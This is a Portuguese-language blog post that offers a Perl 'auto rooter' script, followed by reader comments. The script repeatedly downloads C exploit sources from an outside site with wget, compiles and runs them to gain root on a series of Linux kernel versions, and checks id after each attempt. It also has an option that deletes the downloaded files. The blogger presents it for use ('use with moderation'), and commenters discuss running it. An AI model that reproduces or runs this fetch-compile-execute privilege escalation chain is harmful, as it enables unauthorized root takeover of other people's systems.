O script abaixo não precisa de muitas explicações, vocês não acham ? — Não – Explicação logo abaixo.

#!/usr/bin/perl
#Coded By CrosS ( 2011 Linux Auto r00t3r )
print "###########################################################\n";
print "#             (Beta 1.0 )   Auto rooter by CrosS           #\n";
print "#  Usage :                                                 #\n";
print "#    perl $0 root    => To root            #\n";
print "#    perl $0 del     => Delete Exploit     #\n";
print "#                                                          #\n";
print "#       as R00TW0RM - Private Community is back            #\n";
print "#                  so Releasing 2011 auto rooter =)        #\n";
print "#   in case of error mailto: mr.0x0day[AT]live.com         #\n";
print "#                                                          #\n";
print "#        Thanks to: r0073r and L0rd CrusAd3r               #\n";
print "#              http://www.r00tw0rm.com/forum               #\n";
print "###########################################################\n\n\n";

if ($ARGV[0] =~ "root" )
{
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.18.c");
system("gcc 2.6.18.c -o 2.6.18");
system("chmod 777 2.6.18");
system("./2.6.18");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.33.c");
system("gcc 2.6.33.c -o 2.6.33");
system("chmod 777 2.6.33");
system("./2.6.33");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.34.c");
system("gcc -w 2.6.34.c -o 2.6.34");
system("sudo setcap cap_sys_admin+ep 2.6.34");
system("./2.6.34");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.37-rc2.c");
system("gcc 2.6.37-rc2.c -o 2.6.37-rc2");
system("chmod 777 2.6.37-rc2");
system("./2.6.37-rc2");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.37.c");
system("gcc 2.6.37.c -o 2.6.37");
system("chmod 777 2.6.37");
system("./2.6.37");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.43.2.c");
system("gcc -w 2.6.43.2.c -o 2.6.43.2");
system("sudo setcap cap_sys_admin+ep 2.6.43.2");
system("chmod 777 2.6.43.2");
system("./2.6.43.2");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/3.0.c");
system("gcc 3.0.c -o 3.0");
system("chmod 777 3.0");
system("./3.0");
system("id");
}
if ($ARGV[0] =~ "del" )
{
print "All Exploit deleting ...\n";
system("rm 2.6*;rm -rf 2.6*;rm 3.0*;rm -rf 3.0*");

}

Usem com moderação. 🙂

Atualização: Muita gente está me perguntando para que serve o script acima. Pois bem, este script foi desenvolvido pelo CrosS para explorar algumas vulnerabilidades de algumas versões de kernel do Linux para ter uma escalada de privilégios e se tornar ROOT. Para quem trabalha no mundo Windows este script não serve para nada.

Compartilhar:

Este post tem 14 comentários

  1. Eu sou usuário do windows e não sei pra que serve este exploit ai =/

  2. Como faz para executar esse exploit ?

  3. Aparentemente simples, mas funcional!
    Muito bom isso aí…
    Vou testar 😀

  4. Mais uma sacada do mestre em segurança “GUGA”.
    Vlw Gustavo vc é 10 =)

    Te admiro d+

  5. Pô, alguém conta pra gente o que é?
    Não entendi nada

  6. “Eu sou usuário do windows e não sei pra que serve este exploit ai =/” kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk

  7. Não funciona. Os links do script já estão fora do ar a muito tempo. Dica: Teste as ferramentas antes de divulgar.
    abraço,

  8. Eu fiz o download e funcionou … ontem..

  9. Quando chegar em casa vou testar…

  10. Tinha retirado do ar, mas colocaram de volta. Parabéns.

    abraço,

  11. *tinhaM

  12. POG terrível por que ñ faz em ShellScript logo, Já que é para usar system() dá para fazer até em Assembly,Lisp… Terrível única variável é o ARGV…

    O certo é identificar o kernel com “uname -a” dar regex e extrair a versão do kernel então comparar com a versão do exploit só então executar os CMDs do exploit.

  13. Não sou programador, alguem pode fazer o favor de explicar?
    Comecei a me interessar, mas estou longe de entender. Ainda sou leigo, mas ja comecei a estudar “C”.

    Obrigado a todos e vc Gustavo que esta me apontando um caminho!

  14. Desculpem, não tinha me atentado que o Gustavo ja havia explicado o que o script faz, mas se não for abusar, alguem pode comentar as linhas ou indicar um site com o conteudo semelhante e comentado?

    Obrigado.

Deixe uma resposta

Fechar Menu